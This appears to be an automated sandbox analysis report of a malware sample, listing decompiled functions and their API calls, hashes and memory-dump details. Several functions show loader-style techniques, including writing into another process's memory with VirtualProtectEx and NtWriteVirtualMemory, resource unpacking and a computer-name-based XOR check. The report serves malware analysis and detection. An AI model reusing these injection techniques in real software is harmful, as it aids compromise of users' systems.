C-Code - Quality: 92%

			E004011D3(void* __ecx) {
				void* _v8;
				char _v12;
				char _v76;
				char _v332;
				void* _t22;
				void* _t24;
				void* _t29;
				signed int _t31;

				_t29 = __ecx;
				_push( &_v76);
				_t31 = 0;
				E00401000();
				GetTempPathA(0x100,  &_v332);
				lstrcatA( &_v332,  &_v76);
				_t30 = E00401D9C( &_v332);
				if(_t18 != 0) {
					_t22 = E00401DEE(_t29, _t30,  &_v8,  &_v12); // executed
					E00401686(_t30);
					if(_t22 == 0) {
						_t24 = _v8;
						if(_v12 == 4) {
							_t31 =  *_t24 ^ 0xcbc3f6a1;
						}
						HeapFree( *0x406458, 0, _t24);
					}
				}
				return _t31;
			}

0x004011d3
0x004011e1
0x004011e2
0x004011e4
0x004011f5
0x00401206
0x00401218
0x0040121c
0x00401228
0x00401230
0x00401238
0x0040123e
0x00401241
0x00401245
0x00401245
0x00401254
0x00401254
0x00401238
0x0040125f

APIs

Part of subcall function 00401000: memset.NTDLL ref: 0040101A
Part of subcall function 00401000: GetComputerNameA.KERNEL32(?,?), ref: 00401146
Part of subcall function 00401000: lstrlenA.KERNEL32(?), ref: 00401154

GetTempPathA.KERNEL32(00000100,?), ref: 004011F5
lstrcatA.KERNEL32(?,?), ref: 00401206

Part of subcall function 00401D9C: lstrlenA.KERNEL32(?,00000000,00000000,?,?,00401218,?), ref: 00401DAB
Part of subcall function 00401D9C: mbstowcs.NTDLL ref: 00401DC7

Part of subcall function 00401DEE: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E0C
Part of subcall function 00401DEE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040122D,00000000,?,00000000,?,?), ref: 00401E1C
Part of subcall function 00401DEE: CloseHandle.KERNEL32(000000FF), ref: 00401E7E

Part of subcall function 00401686: HeapFree.KERNEL32(00000000,00000000,004011C3), ref: 00401692

HeapFree.KERNEL32(00000000,?,00000000), ref: 00401254

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: FileFreeHeaplstrlen$CloseComputerCreateHandleNamePathSizeTemplstrcatmbstowcsmemset
String ID:
API String ID: 768330007-0
Opcode ID: 7a5a7b42d17848d6aac0aa21bd3099b30084076db4034f9066434f373d374376
Instruction ID: 5f536d70164053a3bb2c1ee6e22ee6f47d0eb2d5b46d4e5bbb1bc7247f874bf7
Opcode Fuzzy Hash: 7a5a7b42d17848d6aac0aa21bd3099b30084076db4034f9066434f373d374376
Instruction Fuzzy Hash: 6E015E72900118ABDF11ABE4DD85EDFB7BCEF44305F0101B6F605F3160EA74AA458BA9

Uniqueness

Uniqueness Score: -1,00%

Function 0040180F, Relevance: 4.5, APIs: 3, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040180F(void* __ecx, void* __eflags, WCHAR* _a4, void** _a8, long* _a12) {
				signed int _v8;
				void* _t24;
				void* _t30;
				void* _t33;

				_v8 = _v8 & 0x00000000;
				FindResourceW( *0x40646c, _a4, 0xa); // executed
				_t33 = E0040169B(_a4,  &_a4);
				if(_t33 != 0) {
					_t30 =  *((intOrPtr*)(_t33 + 4)) + _t33;
					_t24 = HeapAlloc( *0x406458, 0,  *(_t33 + 0x10));
					if(_t24 != 0) {
						_push(_t24);
						_push(_t30);
						if(E00403EC0() !=  *(_t33 + 0x10)) {
							HeapFree( *0x406458, 0, _t24);
						} else {
							 *_a8 = _t24;
							 *_a12 =  *(_t33 + 0x10);
							_v8 = 1;
						}
					}
				}
				return _v8;
			}

0x00401813
0x00401823
0x00401835
0x00401839
0x0040184b
0x00401853
0x00401857
0x00401859
0x0040185a
0x00401863
0x00401884
0x00401865
0x0040186b
0x00401870
0x00401872
0x00401872
0x00401863
0x0040188b
0x00401891

APIs

FindResourceW.KERNEL32(?,0000000A,?), ref: 00401823
HeapAlloc.KERNEL32(00000000,?,773554BC,00000000,?,?,?,7734C570,004019B1,R32,?,?,?), ref: 0040184D
HeapFree.KERNEL32(00000000,00000000,?), ref: 00401884

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Heap$AllocFindFreeResource
String ID:
API String ID: 1973550565-0
Opcode ID: 17dda2d958f8ae42be4a6b4644430b8dba7d097a56e9ad512ee48791793f6111
Instruction ID: 4f876e942f010b1becd4aa9d19fdc095f7385f77c7f22b9b175ba4d274425439
Opcode Fuzzy Hash: 17dda2d958f8ae42be4a6b4644430b8dba7d097a56e9ad512ee48791793f6111
Instruction Fuzzy Hash: 6F015776100604EFDB21AF15DD84F9E7BB9FB04745F10443AF902A72A0C739EE159BA8

Uniqueness

Uniqueness Score: -1,00%

Function 0043057C, Relevance: 4.5, APIs: 3, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043057C(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v0;
				char* _v8;
				int _v20;
				void* _t10;
				int _t11;
				int _t15;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t19;
				void* _t24;
				void* _t25;

				_t25 = __edi;
				_t19 = __ebx;
				while(1) {
					_t10 = E004317CC(_t19, _t24, _t25, _a4); // executed
					if(_t10 != 0) {
						break;
					}
					_t11 = E0043915E(_t10, _a4);
					__eflags = _t11;
					if(_t11 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E00432030( &_v20,  &_v8);
						_v20 = 0x44d938;
						_t15 = E004323B9( &_v20, 0x4674b0);
						asm("int3");
						__eflags = _v20;
						if(_v20 != 0) {
							_t15 = HeapFree( *0x46c3e0, 0, _v0);
							__eflags = _t15;
							if(__eflags == 0) {
								_t16 = L00437D6A(__eflags);
								_t18 = L00437D7D(GetLastError());
								 *_t16 = _t18;
								return _t18;
							}
						}
						return _t15;
					} else {
						continue;
					}
					L10:
				}
				return _t10;
				goto L10;
			}

0x0043057c
0x0043057c
0x00430591
0x00430594
0x0043059c
0x00000000
0x00000000
0x00430587
0x0043058d
0x0043058f
0x004305a0
0x004305a9
0x004305b0
0x004305be
0x004305c5
0x004305ca
0x00431797
0x0043179b
0x004317a8
0x004317ae
0x004317b0
0x004317b3
0x004317c1
0x004317c7
0x00000000
0x004317c9
0x004317b0
0x004317cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0043058f
0x0043059f
0x00000000

APIs

_malloc.LIBCMT ref: 00430594

Part of subcall function 004317CC: __FF_MSGBANNER.LIBCMT ref: 004317E3
Part of subcall function 004317CC: __NMSG_WRITE.LIBCMT ref: 004317EA
Part of subcall function 004317CC: RtlAllocateHeap.NTDLL(002F0000,00000000,00000001,00000000,00000000,00000000,?,00437514,00000000,00000000,00000000,00000000,?,00435EA2,00000018,004677C0), ref: 0043180F

std::exception::exception.LIBCMT ref: 004305B0
__CxxThrowException@8.LIBCMT ref: 004305C5

Part of subcall function 004323B9: RaiseException.KERNEL32(?,?,00408E3B,?,?,?,?,?,00408E3B,?,00467504,00405116), ref: 0043240A

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID:
API String ID: 3074076210-0
Opcode ID: 629a8b9545d59bc97418110d866eb8186a5cce3fbbb45744d614a74fa5affc25
Instruction ID: 03fc2cf7236624b9cb5630bee2f0192515641d1f2232c312c8ed0878843abf17
Opcode Fuzzy Hash: 629a8b9545d59bc97418110d866eb8186a5cce3fbbb45744d614a74fa5affc25
Instruction Fuzzy Hash: 4DE0E57050020ABADF00EB95CD12ADE36B86B08358F10101BE900E1192DBB89604CE6D

Uniqueness

Uniqueness Score: -1,00%

Function 002C0CFE, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 002C28DE: GlobalAlloc.KERNELBASE(00000040,?), ref: 002C2968

Part of subcall function 002C215E: VirtualProtect.KERNELBASE(?,00001000,00000040,?), ref: 002C2260

GlobalFree.KERNELBASE(?), ref: 002C2BE1

Strings

ntdll, xrefs: 002C2B67, 002C2B6A

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID: Global$AllocFreeProtectVirtual
String ID: ntdll
API String ID: 3015384113-3337577438
Opcode ID: cf8c852887d693dbd994086bceab63b4184f694297c43a486728e4a2eb7fcf8a
Instruction ID: 18a9cfce30cf32ecaf7651a05c420c01517da6928c05097cf76ec45bc7def965
Opcode Fuzzy Hash: cf8c852887d693dbd994086bceab63b4184f694297c43a486728e4a2eb7fcf8a
Instruction Fuzzy Hash: 8641C1B5E10209EFDB04DFE8C885AEEBBB5BF48300F108259E915AB341DB359955CFA0

Uniqueness

Uniqueness Score: -1,00%

Function 002C2B0E, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 002C28DE: GlobalAlloc.KERNELBASE(00000040,?), ref: 002C2968

Part of subcall function 002C215E: VirtualProtect.KERNELBASE(?,00001000,00000040,?), ref: 002C2260

GlobalFree.KERNELBASE(?), ref: 002C2BE1

Strings

ntdll, xrefs: 002C2B67, 002C2B6A

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID: Global$AllocFreeProtectVirtual
String ID: ntdll
API String ID: 3015384113-3337577438
Opcode ID: 6c8b228182f9b8cdbd2cdb71b9002937770f18babdbb9f967d1c70296105ed99
Instruction ID: 2e66b5ec1326bec4fec70caa5a46238b569183fcf5032241cf3e735f633bad02
Opcode Fuzzy Hash: 6c8b228182f9b8cdbd2cdb71b9002937770f18babdbb9f967d1c70296105ed99
Instruction Fuzzy Hash: 8F41B2B5E10209EFDB04DFE8C885AEEBBB5AF48300F108659E915AB341DB359955CFA0

Uniqueness

Uniqueness Score: -1,00%

Function 00402857, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402857(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
				void* __ecx;
				void* __esi;
				void* _t20;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;

				_t24 = __edx;
				_t22 = 8;
				_t26 = E00401671(0x318);
				if(_t26 != 0) {
					memset(_t26, 0, 0x318);
					asm("cdq");
					 *((intOrPtr*)(_t26 + 8)) = _a8;
					 *((intOrPtr*)(_t26 + 0xc)) = _t24;
					asm("cdq");
					 *((intOrPtr*)(_t26 + 0x10)) = _a12;
					 *((intOrPtr*)(_t26 + 0x14)) = _t24;
					if((_a16 & 0x00000010) != 0) {
						L4:
						_t20 = E00402732(_a4, _t23, _t24, _t26); // executed
					} else {
						_t31 =  *0x406464 & 0x00000001;
						if(( *0x406464 & 0x00000001) == 0) {
							goto L4;
						} else {
							_t20 = E004025DC(_t23, _t24, _t26, _t31, _a4);
						}
					}
					_t22 = _t20;
					E00401686(_t26);
				}
				return _t22;
			}

0x00402857
0x00402860
0x0040286c
0x00402870
0x00402876
0x0040287e
0x0040287f
0x00402885
0x00402888
0x00402890
0x00402893
0x00402896
0x004028ab
0x004028ae
0x00402898
0x00402898
0x0040289f
0x00000000
0x004028a1
0x004028a4
0x004028a4
0x0040289f
0x004028b4
0x004028b6
0x004028b6
0x004028c2

APIs

Part of subcall function 00401671: HeapAlloc.KERNEL32(00000000,00000000,00402F6B,00000003,00000000,00000000,00000000,?,?), ref: 0040167D

memset.NTDLL ref: 00402876

Part of subcall function 004025DC: memset.NTDLL ref: 00402602
Part of subcall function 004025DC: memcpy.NTDLL ref: 0040262A
Part of subcall function 004025DC: GetLastError.KERNEL32(00000010,00000218,0040416C,00000100,?,00000318,00000008), ref: 00402641
Part of subcall function 004025DC: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0040416C,00000100), ref: 00402724

Strings

\9@, xrefs: 00402857

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorLastmemset$AllocHeapmemcpy
String ID: \9@
API String ID: 1944541758-3804218092
Opcode ID: 0ac133b24843f79e5e8c3292c3ed79784200f6b71e2cbf26cb4c2be504e2d2ce
Instruction ID: a3cd16eb9840b1d5611974849093b0c1ce68e421734686e2c55665d0c7b66b90
Opcode Fuzzy Hash: 0ac133b24843f79e5e8c3292c3ed79784200f6b71e2cbf26cb4c2be504e2d2ce
Instruction Fuzzy Hash: 8801A2725013086BD321AF29DD49B573BD89F45718F008A3FFC44A72D1D7B99D4486A9

Uniqueness

Uniqueness Score: -1,00%

Function 00403052, Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403052(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				long _v8;
				char _v12;
				int _t14;
				void* _t17;
				void* _t21;

				_t21 = 0;
				_t14 = VirtualProtectEx(_a4, _a8, 4, 0x40,  &_v8); // executed
				if(_t14 != 0) {
					_t17 = E00402C11(_a4, _a8, _a12, 4,  &_v12); // executed
					if(_t17 != 0 && _v12 == 4) {
						_t21 = 1;
					}
					VirtualProtectEx(_a4, _a8, 4, _v8,  &_v8); // executed
				}
				return _t21;
			}

0x0040306a
0x0040306f
0x00403073
0x00403084
0x0040308b
0x00403093
0x00403093
0x004030a3
0x004030a3
0x004030aa

APIs

VirtualProtectEx.KERNELBASE(00000000,?,00000004,00000040,00000000,00000000,00000000,?,?,?,004038F7,00000000,00000000,CCCCFEEB,00000000,00000000), ref: 0040306F

Part of subcall function 00402C11: NtWriteVirtualMemory.NTDLL(00000000,?,00000004,?,00000000,77390479,?,00403089,00000000,?,00000004,00000004,00000000), ref: 00402C2F

VirtualProtectEx.KERNELBASE(00000000,?,00000004,00000000,00000000,00000000,?,00000004,00000004,00000000,?,?,?,004038F7,00000000,00000000), ref: 004030A3

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$MemoryWrite
String ID:
API String ID: 159175985-0
Opcode ID: a4868ee0b93017d2b1259d158f5c2d112d2ce17713054fff38dfbea22765fbbd
Instruction ID: 28815ff9ab664506eae20d9e9f7667374fda2064574062e8ca587915beb37bd9
Opcode Fuzzy Hash: a4868ee0b93017d2b1259d158f5c2d112d2ce17713054fff38dfbea22765fbbd
Instruction Fuzzy Hash: 38F0E77660010DBEEF118F95CD41EAEBBADEB04758F004036BB04A91A0D2B5DE51AB64

Uniqueness

Uniqueness Score: -1,00%

Function 00447201, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00447201(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				void* __esi;
				signed int _t14;
				void* _t15;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t14 = E004313F2(_a12,  &_v8);
				if(_t14 != 0) {
					_push(_t23);
					_push(_a28);
					_push(_a24);
					_t15 = E0044972D(__ebx, _t23, _a4, _a8, _v8, _a16, _a20); // executed
					E00431794(_v8);
					return _t15;
				} else {
					return _t14 | 0xffffffff;
				}
			}

0x00447205
0x00447210
0x00447219
0x00447220
0x00447221
0x00447224
0x00447236
0x00447240
0x0044724c
0x0044721b
0x0044721f
0x0044721f

APIs

___copy_path_to_wide_string.LIBCMT ref: 00447210
_free.LIBCMT ref: 00447240

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ___copy_path_to_wide_string_free
String ID:
API String ID: 339592613-0
Opcode ID: 2a09ab3f0308c224f4baa0584c173a1d6bde4b10ef01baac7ad2a61edd7757cb
Instruction ID: 66e9bc7f08c6c15b88c8496e7dd9fd784c5423852b0f89062e374ead04bde3a6
Opcode Fuzzy Hash: 2a09ab3f0308c224f4baa0584c173a1d6bde4b10ef01baac7ad2a61edd7757cb
Instruction Fuzzy Hash: DBF01C32510109FBDF059F95DD02DDE7B6AEF083A8F104155FA10A51A0E77ACA20AB94

Uniqueness

Uniqueness Score: -1,00%

Function 00404263, Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404263(void* __ecx, void* __ebp, void* __eflags, char _a4) {
				char _t11;
				void* _t18;

				_t18 = __ecx;
				E0040283C(__ecx, __eflags);
				 *(__ecx + 0x3c) =  *(__ecx + 0x3c) & 0x00000000;
				_push(0x20);
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x38)) = _a4;
				_t11 = E00404E51(__ecx, __eflags); // executed
				 *((char*)(__ecx + 0x40)) = _t11;
				if( *((intOrPtr*)(__ecx + 0x38)) == 0) {
					_t16 = __ecx;
					_t11 = E00403828(__ecx,  *(__ecx + 0xc) | 0x00000004, 0);
				}
				if(_a4 != 0) {
					return E00409430(_t16, _t18);
				}
				return _t11;
			}

0x00404264
0x00404266
0x0040426f
0x00404273
0x00404275
0x00404277
0x0040427a
0x00404283
0x00404286
0x00404291
0x00404293
0x00404293
0x0040429d
0x00000000
0x004042a5
0x004042a7

APIs

std::ios_base::_Init.LIBCPMT ref: 00404266

Part of subcall function 0040283C: std::ios_base::clear.LIBCPMT ref: 0040286B
Part of subcall function 0040283C: std::locale::_Init.LIBCPMT ref: 00402880

Part of subcall function 00404E51: __EH_prolog.LIBCMT ref: 00404E56
Part of subcall function 00404E51: std::ios_base::getloc.LIBCPMT ref: 00404E61

std::ios_base::_Addstd.LIBCPMT ref: 004042A0

Part of subcall function 00403828: std::ios_base::clear.LIBCPMT ref: 0040383D

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prologstd::ios_base::getlocstd::locale::_
String ID:
API String ID: 982249214-0
Opcode ID: 2442b43c023b89baede3e2b2dae5f1ea28db8bd0bb2d925587cc31a82a4180a9
Instruction ID: 326a4d40b460064308eb1d0e62ed0b2b66daf8ee128f7e837d1d26799e1b3356
Opcode Fuzzy Hash: 2442b43c023b89baede3e2b2dae5f1ea28db8bd0bb2d925587cc31a82a4180a9
Instruction Fuzzy Hash: 0DE0ED31A047505FE630BB25C046B0BB7D46B40328F00882FF18266AC2C7BCE8408B99

Uniqueness

Uniqueness Score: -1,00%

Function 00404E51, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E51(void* __ecx, void* __eflags) {
				void* _t13;
				intOrPtr* _t14;
				void* _t16;
				void* _t23;
				void* _t26;
				void* _t29;

				_t29 = __eflags;
				E00432414(0x44cd36, _t26);
				_t1 = _t26 - 0x10; // -15
				_t13 = E00404228(__ecx, _t1);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t14 = E004018B4(_t29); // executed
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t6 = _t26 - 0x10; // -15
				L00401F1F(_t6);
				_t16 =  *((intOrPtr*)( *_t14 + 0x20))( *((intOrPtr*)(_t26 + 8)), _t13, _t23, __ecx);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t16;
			}

0x00404e51
0x00404e56
0x00404e5d
0x00404e61
0x00404e66
0x00404e6b
0x00404e70
0x00404e75
0x00404e7a
0x00404e86
0x00404e8d
0x00404e95

APIs

__EH_prolog.LIBCMT ref: 00404E56
std::ios_base::getloc.LIBCPMT ref: 00404E61

Part of subcall function 004018B4: __EH_prolog.LIBCMT ref: 004018B9
Part of subcall function 004018B4: std::_Lockit::_Lockit.LIBCPMT ref: 004018C8
Part of subcall function 004018B4: int.LIBCPMT ref: 004018DF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: H_prolog$LockitLockit::_std::_std::ios_base::getloc
String ID:
API String ID: 2455458374-0
Opcode ID: 21c75106486b1c04b059c352ee4dd33b2f7f6d0506a8a727376852d9b84917c4
Instruction ID: ab18adb2c1bdeada28dd63580104d8eefe67124c6abadec77aafd6c487239808
Opcode Fuzzy Hash: 21c75106486b1c04b059c352ee4dd33b2f7f6d0506a8a727376852d9b84917c4
Instruction Fuzzy Hash: B7E065B2900214ABCB15EBA0D845ADDB775FF44324F10866FF462A36D1CB3C9604CA54

Uniqueness

Uniqueness Score: -1,00%

Function 004305D0, Relevance: 3.0, APIs: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004305D0() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E004374B4(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6); // executed
				 *0x46c9e0 = _t1;
				 *0x46c9dc = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}

0x004305d5
0x004305dc
0x004305df
0x004305e5
0x004305ea
0x004305f1
0x004305f8
0x004305fe
0x004305f3
0x004305f5
0x004305f7
0x004305f7

APIs

__calloc_crt.LIBCMT ref: 004305D5

Part of subcall function 004374B4: __calloc_impl.LIBCMT ref: 004374C3
Part of subcall function 004374B4: Sleep.KERNEL32(00000000), ref: 004374DA

RtlEncodePointer.NTDLL(00000000), ref: 004305DF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: EncodePointerSleep__calloc_crt__calloc_impl
String ID:
API String ID: 2972565945-0
Opcode ID: fcd7a9965809ed4908806db52736b398db84b7ee314328a9302f30c41a3f1c68
Instruction ID: 97918d22bd371fd9c3c71a1105878117d50129eb864fbb54733f11197501a587
Opcode Fuzzy Hash: fcd7a9965809ed4908806db52736b398db84b7ee314328a9302f30c41a3f1c68
Instruction Fuzzy Hash: 78D02B729897205FE3B09B247C067A22BC0DB08730F00406BF980D92C0EF6408408A8C

Uniqueness

Uniqueness Score: -1,00%

Function 002C19AE, Relevance: 1.6, APIs: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000), ref: 002C1A6B

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 95796127965b4bbd7b22a9986ecfbf407d0bc2e326c7f9242d785080bb737f6f
Instruction ID: a934f31365754abb94f7e563a41de38449ae521c229636e6e086d3bc881f69fb
Opcode Fuzzy Hash: 95796127965b4bbd7b22a9986ecfbf407d0bc2e326c7f9242d785080bb737f6f
Instruction Fuzzy Hash: 1B51CEB4D11209DFCB04CF98C495BEEBBB1BF49308F208259D815AB351D775AA65CFA0

Uniqueness

Uniqueness Score: -1,00%

Function 004095C8, Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004095C8(void* __ebx, signed int _a8) {
				intOrPtr _v0;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				signed char _t17;
				signed int _t18;
				signed int _t19;
				signed int _t22;
				void* _t23;
				intOrPtr _t25;
				signed int _t28;
				signed int _t31;
				signed int _t34;
				void* _t38;

				_t23 = __ebx;
				_pop(_t36);
				_t16 = _a8;
				_t31 = _t16 & 0x00000004;
				_t28 = _t16 & 0x00000080;
				_t25 = 1;
				if((_t16 & 0x00000040) != 0) {
					_t16 = _t16 | 1;
				}
				if((_t16 & 0x00000008) != 0) {
					_t16 = _t16 | 0x00000002;
				}
				_t17 = _t16 & 0xffffff3b;
				_t34 = 0;
				while(_t25 != _t17) {
					_t25 =  *((intOrPtr*)(0x44e758 + _t34 * 4));
					_t34 = _t34 + 1;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				if( *((intOrPtr*)(0x44e754 + _t34 * 4)) != 0) {
					__eflags = _t28;
					if(_t28 == 0) {
						L15:
						_t18 = E004095D1(_v0, _t34, _a8); // executed
						_t34 = _t18;
						__eflags = _t34;
						if(_t34 == 0) {
							goto L9;
						} else {
							__eflags = _t31;
							if(__eflags == 0) {
								L19:
								_t19 = _t34;
							} else {
								_push(2);
								_push(0);
								_push(_t34);
								__eflags = E004377FA(_t23, _t28, _t31, _t34, __eflags);
								if(__eflags == 0) {
									goto L19;
								} else {
									_push(_t34);
									goto L14;
								}
							}
						}
					} else {
						__eflags = _t17 & 0x0000000a;
						if((_t17 & 0x0000000a) == 0) {
							goto L15;
						} else {
							_t22 = E004095D1(_v0, 0, _a8);
							_t38 = _t38 + 0xc;
							__eflags = _t22;
							if(__eflags == 0) {
								goto L15;
							} else {
								_push(_t22);
								L14:
								E00430776(_t23, _t31, _t34, __eflags);
								goto L9;
							}
						}
					}
				} else {
					L9:
					_t19 = 0;
				}
				return _t19;
			}

0x004095c8
0x004095cb
0x00409529
0x00409534
0x00409537
0x0040953d
0x00409540
0x00409542
0x00409542
0x00409546
0x00409548
0x00409548
0x0040954b
0x00409550
0x00409552
0x00409556
0x0040955d
0x00409560
0x00000000
0x00000000
0x00000000
0x00409560
0x0040956a
0x00409570
0x00409572
0x00409595
0x0040959c
0x004095a1
0x004095a6
0x004095a8
0x00000000
0x004095aa
0x004095aa
0x004095ac
0x004095c2
0x004095c2
0x004095ae
0x004095ae
0x004095b0
0x004095b2
0x004095bb
0x004095bd
0x00000000
0x004095bf
0x004095bf
0x00000000
0x004095bf
0x004095bd
0x004095ac
0x00409574
0x00409574
0x00409576
0x00000000
0x00409578
0x00409580
0x00409585
0x00409588
0x0040958a
0x00000000
0x0040958c
